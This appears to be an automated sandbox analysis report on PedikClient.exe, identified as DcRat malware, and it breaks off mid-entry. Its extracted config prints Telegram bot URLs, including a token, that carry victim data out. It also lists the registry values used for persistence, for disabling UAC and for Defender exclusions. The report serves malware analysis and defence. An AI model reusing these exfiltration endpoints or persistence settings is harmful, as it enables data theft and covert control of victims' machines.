Analysis
-
max time kernel
600s -
max time network
600s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
23-10-2024 02:28
Static task
static1
Behavioral task
behavioral1
Sample
PedikClient.exe
Resource
win11-20241007-en
General
-
Target
PedikClient.exe
-
Size
1.7MB
-
MD5
28d6347c722e5cac5ae9245b16d4754c
-
SHA1
45a79b7368ec79516ab1772188bec1b36c43d498
-
SHA256
eb0e511e7656cf46b8632c82afd2c54fc28ca897fc852229839d67e9a23700e1
-
SHA512
643465e266e0bd5b2659d68bd3752cd53c88be29f3fe1805523196c1b3720279e34919f4a6d53c1e3a867f3b1d5c38c4abb8c7d68cce13cc11e62de911aac181
-
SSDEEP
49152:MfZ8c3XIwfnWpiDwDFyeEPk3Oy89y1iRW4SEXtTd15:MhVXIwfIdceEPk3O/y1iRW4SutJ15
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendPhoto?chat_id=7706607495&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%E2%80%A2%20Comment%3A%20Arbuzik%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20RPHBTALT%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20138.199.29.44%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%20(x86)%5CGoogle%5Cdwm.ex
https://api.telegram.org/bot7836713809:AAFVjVgs5X6tBgtn8kQYnLmDb16xmnacHfg/sendDocument?chat_id=7706607495&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%2054fc3e5a6b55272eba6a6924abad84753916e711%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A01.371713
Signatures
-
DcRat 11 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 2120 schtasks.exe 4400 schtasks.exe 5028 schtasks.exe 2804 schtasks.exe 4220 schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PedikClient.exe 1696 schtasks.exe File created C:\Windows\SysWOW64\7laDcN0rCRiiFFEryGzr87P90jYlcM.bat Injector.exe 1864 schtasks.exe 1328 schtasks.exe 4796 schtasks.exe -
Modifies WinLogon for persistence 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Google\\dwm.exe\"" dwm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe" dwm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\SendTo\\sysmon.exe\"" SystemUpdates.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\SendTo\\sysmon.exe\", \"C:\\Program Files\\Uninstall Information\\dllhost.exe\"" SystemUpdates.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\SendTo\\sysmon.exe\", \"C:\\Program Files\\Uninstall Information\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\dwm.exe\"" SystemUpdates.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\SendTo\\sysmon.exe\", \"C:\\Program Files\\Uninstall Information\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\dwm.exe\"" dwm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Uninstall Information\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\dwm.exe\"" dwm.exe -
Process spawned unexpected child process 19 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1328 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1696 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2804 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1864 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4220 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2120 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4400 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5028 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4796 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3892 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3620 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3800 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2904 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3408 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3032 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 964 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 712 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2988 940 schtasks.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 236 940 schtasks.exe 87 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" SystemUpdates.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" SystemUpdates.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" dwm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" dwm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" dwm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" SystemUpdates.exe -
resource yara_rule behavioral1/files/0x001b00000002ab33-6.dat dcrat behavioral1/files/0x001900000002ab4a-30.dat dcrat behavioral1/memory/4100-32-0x0000000000990000-0x0000000000B20000-memory.dmp dcrat -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4668 powershell.exe 4480 powershell.exe 4892 powershell.exe 4736 powershell.exe 3340 powershell.exe 1808 powershell.exe 4060 powershell.exe 4928 powershell.exe 1668 powershell.exe 4848 powershell.exe 4836 powershell.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2872 netsh.exe -
Executes dropped EXE 4 IoCs
pid Process 1188 Injector.exe 4976 ExInjector.exe 4100 SystemUpdates.exe 4320 dwm.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Uninstall Information\\dllhost.exe\"" SystemUpdates.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Uninstall Information\\dllhost.exe\"" SystemUpdates.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Google\\dwm.exe\"" SystemUpdates.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Google\\dwm.exe\"" SystemUpdates.exe Set value (str) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\Users\\Default\\SendTo\\sysmon.exe\"" SystemUpdates.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\Users\\Default\\SendTo\\sysmon.exe\"" SystemUpdates.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" dwm.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SystemUpdates.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" SystemUpdates.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA dwm.exe -
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ipinfo.io 6 ipinfo.io -
Drops file in System32 directory 9 IoCs
description ioc Process File created C:\Windows\SysWOW64\Explower.exe ExInjector.exe File opened for modification C:\Windows\SysWOW64\Explower.exe ExInjector.exe File opened for modification C:\Windows\SysWOW64\SystemUpdates.exe Injector.exe File created C:\Windows\SysWOW64\Pj3sASAQmYbZO22AgnND3YNrHBGc.vbe Injector.exe File opened for modification C:\Windows\SysWOW64\7laDcN0rCRiiFFEryGzr87P90jYlcM.bat Injector.exe File created C:\Windows\SysWOW64\SystemUpdates.exe Injector.exe File opened for modification C:\Windows\SysWOW64\Pj3sASAQmYbZO22AgnND3YNrHBGc.vbe Injector.exe File created C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_240629703 Injector.exe File created C:\Windows\SysWOW64\7laDcN0rCRiiFFEryGzr87P90jYlcM.bat Injector.exe -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files (x86)\Google\6cb0b6c459d5d3 SystemUpdates.exe File created C:\Program Files\Uninstall Information\dllhost.exe SystemUpdates.exe File created C:\Program Files\Uninstall Information\5940a34987c991 SystemUpdates.exe File created C:\Program Files (x86)\Google\dwm.exe SystemUpdates.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ExInjector.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PedikClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Injector.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Checks SCSI registry key(s) 3 TTPs 58 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchHost.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Internet Explorer\GPU SearchHost.exe -
Modifies registry class 45 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "10580" SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "12426" SearchHost.exe Set value (data) \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 